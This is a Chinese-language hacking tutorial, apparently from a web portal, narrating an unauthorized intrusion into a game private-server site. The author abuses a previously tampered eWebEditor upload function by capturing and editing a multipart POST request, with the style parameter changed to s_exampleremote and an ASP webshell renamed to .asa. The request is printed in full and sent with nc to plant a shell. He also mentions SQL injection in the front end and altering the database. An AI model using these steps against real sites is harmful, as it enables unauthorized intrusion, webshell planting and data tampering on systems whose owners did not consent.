教你如何踩着别人的脚印入侵

下午,朋友丢给我一个魔兽私服站,摸底得知win2003+php+mysql系统
　　粗查了一下没注入.有admin/目录
　　用阿D扫出来一个admin/ewebeditor目录
　　下载ewebeditor.mdb,但发现密码没有办法破解
　　废话就不讲了.其它的地方没有发现问题后,在ewebeditor下发现原来被人搞过了,在最后上传图像区里被人加了asa,呵呵,
                                   
javascript:if(this.width>500)this.width=500" border=0>
 
　　看样子是有路,马上调用他
　　http://www.xxxx.cn/admin/ewebeditor/ewebeditor.asp?id=45&style=s_exampleremote
                                         
javascript:if(this.width>500)this.width=500" border=0>
 
　　一看,没有上传文件的图标.这下麻烦,ASA是可以上传了,但怎么上传呢,具体请看操作: 先打开抓包的东东,正常上传一个jpg试试,这里的77169.jpg就是我们的ASP马了,只是改个名字
POST /admin/ewebeditor/upload.asp?action=save&type=IMAGE&style=standard HTTP/1.1
Accept: */*
Referer: http://www.xxxxx.cn/admin/ewebeditor/upload.asp?type=image&style=standard
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d83c837130798
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.xxxx.cn
Content-Length: 79810
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSBTDCRT=EEDHFINDJGPEJJJFJHCJJIOK
-----------------------------7d83c837130798
Content-Disposition: form-data; name="uploadfile"; filename="G:\mm\77169.jpg"
Content-Type: text/plain
(一共二条记录,下面的东东太多了,70多K,就省了,关键是前面)
以下忽略N字
　　抓包后在这里我们发现/admin/ewebeditor/upload.asp?action=save&type=IMAGE&style=standard
　　其中的style=standard有点眼熟啊,我把他改成s_exampleremote试试,再把77169.jpg改成77169.asa,(这里有二处,前面一处,最后还有一处)
　　改后存为a.txt
　　然后用nc发送
                                 
javascript:if(this.width>500)this.width=500" border=0>
 
　　最后type b.txt
               
javascript:if(this.width>500)this.width=500" border=0>
 
　　呵呵路径也出来了,登陆吧
　　PS:原来发现把网址放图片上了,呵呵,不想改了,各位大牛要怎么样就怎样吧,实际前台php 是有注入的 ,这里主要讲ewebeditor,我就省了吧,好像前台的注入也拿不下sehll,虽然是root的,数据库我就改了,大家不要再试了,多少算台服务器,不要让某某别有用心的人拿去挂马了。

责任编辑：火韦推荐给好友 到论坛交流 加入收藏 打印本页 关闭窗口